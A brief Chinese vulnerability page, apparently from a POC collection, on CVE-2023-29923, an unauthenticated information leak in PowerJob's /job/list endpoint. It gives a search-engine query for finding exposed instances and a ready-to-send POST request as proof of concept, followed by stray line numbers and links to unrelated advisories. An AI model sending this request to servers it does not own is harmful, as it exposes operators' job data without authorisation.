# PowerJob list 信息泄漏漏洞 CVE-2023-29923

# 漏洞描述

PowerJob list接口存在信息泄漏漏洞，攻击者无需通过授权就可以访问授权的接口，获取敏感数据

# 漏洞影响

PowerJob

# 网络测绘

app="PowerJob"

# 漏洞复现

登陆页面

验证POC

POST /job/list
Content-Type: application/json

{"appId":1,"index":0,"pageSize":10}

1
2
3
4

Appspace jsonprequest SSRF漏洞 CVE-2021-27670 TamronOS IPTV系统 submit 任意用户创建漏洞